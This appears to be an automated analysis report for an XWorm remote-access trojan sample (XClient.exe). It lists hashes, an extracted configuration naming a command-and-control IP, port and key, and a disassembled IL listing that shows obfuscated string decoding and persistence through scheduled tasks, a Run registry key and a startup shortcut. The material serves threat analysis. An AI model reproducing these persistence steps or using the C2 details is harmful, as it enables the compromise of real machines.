00ca5f39ac3e10bacd20be2ac1747395
PE Executable | MD5: 00ca5f39ac3e10bacd20be2ac1747395 | Size: 287.23 KB | application/x-dosexec
Symbol Obfuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 00ca5f39ac3e10bacd20be2ac1747395
|
| Sha1 | 3d170d7278bfe3dac685f8bd3f45d663c13dc4b2
|
| Sha256 | d6c8c18dbc47521d80575eee4f4267e8076eaf360d72d423e4b7056cbc8bc830
|
| Sha384 | ae0b85636c69a639742485b39dd7217396c8e3c84f42d4fe076ce97e3c6477cef0d4e571010c9e8b756b18103ca52ef6
|
| Sha512 | a264c2a9f862ff8e4e768ddf44aac052f405f64d0605c035c1993eaf64bb817979df386936a54c0429575a0c2d254e90f600297e02b0ea13d6fcccb82dfa6833
|
| SSDeep | 6144:h0BG12DErVbTDa3L2iTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVE:h0Bjy5aB
|
| TLSH | 1254D881DF88148BEC3A9F31E1B0B7654B7BEAD0B89A9F6D205D3D2D7C54A409C02779
|
PeID
|
Config. Field0 | Value |
|---|---|
| Mutex | 35JqrAaohVlAJCkY |
| Hosts | 45.74.19.28 |
| Port | 443 |
| KEY | craxsrat |
| USBNM | <Xwormmm> |
| LoggerPath | %ProgramData% |
| family | xworm |
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | XClient.exe |
| Full Name | XClient.exe |
| EntryPoint | System.Void Stub.UvCI8MLofEi6lFXnao8uGd::p4in1nvjQjN5Gq1DQAEpEY() |
| Scope Name | XClient.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | XClient |
| Assembly Version | 4.18.23110.3 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 438 |
| Main Method | System.Void Stub.UvCI8MLofEi6lFXnao8uGd::p4in1nvjQjN5Gq1DQAEpEY() |
| Main IL Instruction Count | 338 |
| Main IL | ldsfld System.Int32 LbQFHOkhcRLbvwvTMt7tuk::PrIQtZrTAZutFr0RMsBsau ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::9lAu8w1bqUAptrlHYTZXi5 call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::9lAu8w1bqUAptrlHYTZXi5 ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::AlYbFsc9FgDWWTnMJSpS4I call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::AlYbFsc9FgDWWTnMJSpS4I ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::XC6FvR7awaoUNTwB3PMnNh call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::XC6FvR7awaoUNTwB3PMnNh ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::z0z9cdakxtXplbenDKvVnC call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::z0z9cdakxtXplbenDKvVnC ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::KkXApUTK5Jnzsd4DHPdiqg call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::KkXApUTK5Jnzsd4DHPdiqg ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::2M1mu2oT2WylxtIMB5koUe call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::2M1mu2oT2WylxtIMB5koUe ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::UrsNfRfXqIy09mJVXjkllP call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::UrsNfRfXqIy09mJVXjkllP ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::MWwDJJAKRfsZVe1TuFog21 call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::MWwDJJAKRfsZVe1TuFog21 ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::zcGICJyukyq1HbLDChLbLh call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::zcGICJyukyq1HbLDChLbLh ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::GNuXqxC6LDICNFpoy1KEkc call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::GNuXqxC6LDICNFpoy1KEkc ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::2VbJ8P5ce3y4N6QhDBnrsY call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::2VbJ8P5ce3y4N6QhDBnrsY ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::eeRbwjU3QLNOleqA7MXXq1 call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::eeRbwjU3QLNOleqA7MXXq1 ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::LNVmzkrruJFAbQzFlL4KIz call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::LNVmzkrruJFAbQzFlL4KIz leave.s IL_012F: call System.Boolean Stub.vP9j7AOZllPWf37CpaPkg2kPfCBUuJBFven7E8CQOEk6m1gFMwE7e6KZ4JjpSjTpvMDkm1ev::bAWzUeMeCInOtpqTer6eCwtFvhuyI1XHl4ZAHdeLKnBwvLe1SNtsEI5nZBsOFsY9Z4ieoJtF() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.3 <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_012F: call System.Boolean Stub.vP9j7AOZllPWf37CpaPkg2kPfCBUuJBFven7E8CQOEk6m1gFMwE7e6KZ4JjpSjTpvMDkm1ev::bAWzUeMeCInOtpqTer6eCwtFvhuyI1XHl4ZAHdeLKnBwvLe1SNtsEI5nZBsOFsY9Z4ieoJtF() call System.Boolean Stub.vP9j7AOZllPWf37CpaPkg2kPfCBUuJBFven7E8CQOEk6m1gFMwE7e6KZ4JjpSjTpvMDkm1ev::bAWzUeMeCInOtpqTer6eCwtFvhuyI1XHl4ZAHdeLKnBwvLe1SNtsEI5nZBsOFsY9Z4ieoJtF() brtrue.s IL_013C: call System.Void Stub.UvCI8MLofEi6lFXnao8uGd::XoM7BrSvlMF6dHv8nDRqWl() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Stub.UvCI8MLofEi6lFXnao8uGd::XoM7BrSvlMF6dHv8nDRqWl() ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::UrsNfRfXqIy09mJVXjkllP ldstr \ ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::MWwDJJAKRfsZVe1TuFog21 call System.String System.String::Concat(System.String,System.String,System.String) stloc.0 <null> ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) callvirt System.IO.DirectoryInfo System.IO.FileInfo::get_Directory() callvirt System.String System.IO.DirectoryInfo::get_FullName() stloc.s V_4 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_0183: ldloc.0 ldloc.s V_4 call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.0 <null> call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_019A: ldc.i4 1000 ldloc.0 <null> newobj System.Void System.IO.FileInfo::.ctor(System.String) stloc.s V_5 ldloc.s V_5 callvirt System.Void System.IO.FileInfo::Delete() ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.0 <null> ldsfld System.String Stub.vP9j7AOZllPWf37CpaPkg2kPfCBUuJBFven7E8CQOEk6m1gFMwE7e6KZ4JjpSjTpvMDkm1ev::wEvF0rjYalZyUoCzZAMG5BoHjxEUGztF9VYVZeoPSL0csr2mzYPuxliw58nQaw7o7uQWoNgf call System.Byte[] System.IO.File::ReadAllBytes(System.String) call System.Void System.IO.File::WriteAllBytes(System.String,System.Byte[]) leave.s IL_01C5: ldstr "schtasks.exe" dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_6 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_01C5: ldstr "schtasks.exe" ldstr schtasks.exe newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String) stloc.s V_8 ldloc.s V_8 ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle) call System.String Stub.V3yVU3SxD6hqTxjz9xIv7h::9EvvLFqGP7DiNDDps1wthCPj9FVGShzlFlnCtjxF8yCXt6SSCcmzgg() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_022B: ldloc.s V_8 ldloc.s V_8 ldc.i4.5 <null> newarr System.String stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldstr /create /f /RL HIGHEST /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_13 ldc.i4.1 <null> ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::MWwDJJAKRfsZVe1TuFog21 call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_13 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_13 ldc.i4.3 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_13 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_13 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) br.s IL_026F: ldloc.s V_8 ldloc.s V_8 ldc.i4.5 <null> newarr System.String stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldstr /create /f /sc minute /mo 1 /tn " stelem.ref <null> ldloc.s V_13 ldc.i4.1 <null> ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::MWwDJJAKRfsZVe1TuFog21 call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) stelem.ref <null> ldloc.s V_13 ldc.i4.2 <null> ldstr " /tr " stelem.ref <null> ldloc.s V_13 ldc.i4.3 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_13 ldc.i4.4 <null> ldstr " stelem.ref <null> ldloc.s V_13 call System.String System.String::Concat(System.String[]) callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String) ldloc.s V_8 call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_7 ldloc.s V_7 callvirt System.Void System.Diagnostics.Process::WaitForExit() leave.s IL_0290: call My.KKeontSr3KPlfTen8Cb28A My.f7jGy1NxKAXFWX0lw7IUMP::kD11LkYbs4RukCEFQ4BIBV() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_9 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_0290: call My.KKeontSr3KPlfTen8Cb28A My.f7jGy1NxKAXFWX0lw7IUMP::kD11LkYbs4RukCEFQ4BIBV() call My.KKeontSr3KPlfTen8Cb28A My.f7jGy1NxKAXFWX0lw7IUMP::kD11LkYbs4RukCEFQ4BIBV() callvirt Microsoft.VisualBasic.MyServices.RegistryProxy Microsoft.VisualBasic.Devices.ServerComputer::get_Registry() callvirt Microsoft.Win32.RegistryKey Microsoft.VisualBasic.MyServices.RegistryProxy::get_CurrentUser() ldstr SOFTWARE\Microsoft\Windows\CurrentVersion\Run ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::MWwDJJAKRfsZVe1TuFog21 call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldloc.0 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object) leave.s IL_02CB: ldc.i4.7 dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_10 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_02CB: ldc.i4.7 ldc.i4.7 <null> call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr \ ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::MWwDJJAKRfsZVe1TuFog21 call System.String System.IO.Path::GetFileNameWithoutExtension(System.String) ldstr .lnk call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.s V_11 ldstr WScript.Shell ldstr call System.Object Microsoft.VisualBasic.Interaction::CreateObject(System.String,System.String) ldnull <null> ldstr CreateShortcut ldc.i4.1 <null> newarr System.Object stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> ldloc.s V_11 stelem.ref <null> ldloc.s V_14 stloc.s V_15 ldloc.s V_15 ldnull <null> ldnull <null> ldc.i4.1 <null> newarr System.Boolean stloc.s V_16 ldloc.s V_16 ldc.i4.0 <null> ldc.i4.1 <null> stelem.i1 <null> ldloc.s V_16 call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateGet(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[]) ldloc.s V_16 ldc.i4.0 <null> ldelem.i1 <null> brfalse.s IL_0350: stloc.s V_17 ldloc.s V_15 ldc.i4.0 <null> ldelem.ref <null> call System.Object System.Runtime.CompilerServices.RuntimeHelpers::GetObjectValue(System.Object) ldtoken System.String call System.Type System.Type::GetTypeFromHandle(System.RuntimeTypeHandle) call System.Object Microsoft.VisualBasic.CompilerServices.Conversions::ChangeType(System.Object,System.Type) castclass System.String stloc.s V_11 stloc.s V_17 ldloc.s V_17 ldnull <null> ldstr TargetPath ldc.i4.1 <null> newarr System.Object stloc.s V_18 ldloc.s V_18 ldc.i4.0 <null> ldloc.0 <null> stelem.ref <null> ldloc.s V_18 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_17 ldnull <null> ldstr WorkingDirectory ldc.i4.1 <null> newarr System.Object stloc.s V_18 ldloc.s V_18 ldc.i4.0 <null> ldstr stelem.ref <null> ldloc.s V_18 ldnull <null> ldnull <null> ldc.i4.0 <null> ldc.i4.1 <null> call System.Void Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateSetComplex(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean,System.Boolean) ldloc.s V_17 ldnull <null> ldstr Save ldc.i4.0 <null> newarr System.Object ldnull <null> ldnull <null> ldnull <null> ldc.i4.1 <null> call System.Object Microsoft.VisualBasic.CompilerServices.NewLateBinding::LateCall(System.Object,System.Type,System.String,System.Object[],System.String[],System.Type[],System.Boolean[],System.Boolean) pop <null> ldnull <null> stloc.s V_17 ldloc.s V_11 ldc.i4.3 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode) stsfld System.IO.FileStream Stub.vP9j7AOZllPWf37CpaPkg2kPfCBUuJBFven7E8CQOEk6m1gFMwE7e6KZ4JjpSjTpvMDkm1ev::6TH2vcTvxY73QHiAIaGbsIw8BZDaxi8PTrt9QZAsUqvR3JpU2FARLWmU2QMYfqj9nxuMtuq9 leave.s IL_03CF: call System.Void Stub.uqdLVcuuUiIGluTNmT19TA18joYjriddm8ztLxRJ2lq6spSQfyqxL2UDESBYyagDRWKw4nr98kory5Sf9L8vHXm::MHFNxvTbPabMTJVhovkrRu5k4YTb5bJF312AfdcMmWkULJaYgtJT3lK5LnBweoKDDh8qgtegc31HWZJY3ZxSVIM() dup <null> call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::SetProjectError(System.Exception) stloc.s V_12 call System.Void Microsoft.VisualBasic.CompilerServices.ProjectData::ClearProjectError() leave.s IL_03CF: call System.Void Stub.uqdLVcuuUiIGluTNmT19TA18joYjriddm8ztLxRJ2lq6spSQfyqxL2UDESBYyagDRWKw4nr98kory5Sf9L8vHXm::MHFNxvTbPabMTJVhovkrRu5k4YTb5bJF312AfdcMmWkULJaYgtJT3lK5LnBweoKDDh8qgtegc31HWZJY3ZxSVIM() call System.Void Stub.uqdLVcuuUiIGluTNmT19TA18joYjriddm8ztLxRJ2lq6spSQfyqxL2UDESBYyagDRWKw4nr98kory5Sf9L8vHXm::MHFNxvTbPabMTJVhovkrRu5k4YTb5bJF312AfdcMmWkULJaYgtJT3lK5LnBweoKDDh8qgtegc31HWZJY3ZxSVIM() call System.Void Stub.vP9j7AOZllPWf37CpaPkg2kPfCBUuJBFven7E8CQOEk6m1gFMwE7e6KZ4JjpSjTpvMDkm1ev::UUcwDLY6yIP4iPo8wp5fGocbs76hDwTK9VlYrPLrzsJdLNA8d8gtd84IxI37tBVeJEhkSt4C() ldnull <null> ldftn System.Void Stub.UvCI8MLofEi6lFXnao8uGd::ebcEBkIBptq6wEJZoTd5kU() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() ldnull <null> ldftn System.Void Stub.UvCI8MLofEi6lFXnao8uGd::08PSPkLdKhSUcCPkzpaaLX() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Threading.Thread::Start() call System.String Stub.V3yVU3SxD6hqTxjz9xIv7h::9EvvLFqGP7DiNDDps1wthCPj9FVGShzlFlnCtjxF8yCXt6SSCcmzgg() call System.Boolean Microsoft.VisualBasic.CompilerServices.Conversions::ToBoolean(System.String) brfalse.s IL_0416: call System.Void Stub.UvCI8MLofEi6lFXnao8uGd::qnV11KZkRfqEc867kJ8juY() call System.Void Stub.2Gl6ySuN5jETPiDdlPiwqtYhTB0v7hjdQ0f1xiA7mNxBEMbXTAu46Z10vG2d1vcgE1kXD5Ol::lRN1LYz53iYBN05Dh2x12NsqcNPlWspSkdnjKsXA8u2QRCOPF3CtATg49qS1nyHvMOlVj2MM() call System.Void Stub.UvCI8MLofEi6lFXnao8uGd::qnV11KZkRfqEc867kJ8juY() ldnull <null> ldftn System.Void Stub.UvCI8MLofEi6lFXnao8uGd::PBd6jyr7nfSryk01sBdkBV() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.1 <null> ldnull <null> ldftn System.Void Stub.UvCI8MLofEi6lFXnao8uGd::1U5pG2qRV2l1XUYnx0uQh1() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) stloc.2 <null> ldloc.1 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Start() ldloc.2 <null> callvirt System.Void System.Threading.Thread::Join() ret <null> |
| Module Name | XClient.exe |
| Full Name | XClient.exe |
| EntryPoint | System.Void Stub.UvCI8MLofEi6lFXnao8uGd::p4in1nvjQjN5Gq1DQAEpEY() |
| Scope Name | XClient.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | XClient |
| Assembly Version | 4.18.23110.3 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 438 |
| Main Method | System.Void Stub.UvCI8MLofEi6lFXnao8uGd::p4in1nvjQjN5Gq1DQAEpEY() |
| Main IL Instruction Count | 338 |
| Main IL | ldsfld System.Int32 LbQFHOkhcRLbvwvTMt7tuk::PrIQtZrTAZutFr0RMsBsau ldc.i4 1000 mul.ovf <null> call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::9lAu8w1bqUAptrlHYTZXi5 call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::9lAu8w1bqUAptrlHYTZXi5 ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::AlYbFsc9FgDWWTnMJSpS4I call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::AlYbFsc9FgDWWTnMJSpS4I ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::XC6FvR7awaoUNTwB3PMnNh call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::XC6FvR7awaoUNTwB3PMnNh ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::z0z9cdakxtXplbenDKvVnC call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::z0z9cdakxtXplbenDKvVnC ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::KkXApUTK5Jnzsd4DHPdiqg call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::KkXApUTK5Jnzsd4DHPdiqg ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::2M1mu2oT2WylxtIMB5koUe call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::2M1mu2oT2WylxtIMB5koUe ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::UrsNfRfXqIy09mJVXjkllP call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) call System.String System.Environment::ExpandEnvironmentVariables(System.String) stsfld System.String LbQFHOkhcRLbvwvTMt7tuk::UrsNfRfXqIy09mJVXjkllP ldsfld System.String LbQFHOkhcRLbvwvTMt7tuk::MWwDJJAKRfsZVe1TuFog21 call System.Object Stub.JX6BzSjWl4Z5DJEgzwtlg3G3MXgfAlMb5VAbQC2maVgk2AHPSbIzRRb8ncaBux8Ic3I01XCa::VfBoYePZzfD1Lzp7HbXDV1fATxPBb3SlaudTPmgJnxovtk8ij8qCcQWEPnY1Zxus8E757U7t(System.String) call System.String Microsoft.VisualBasic.CompilerServices.Conversions::ToString(System.Object) stsfld System.String 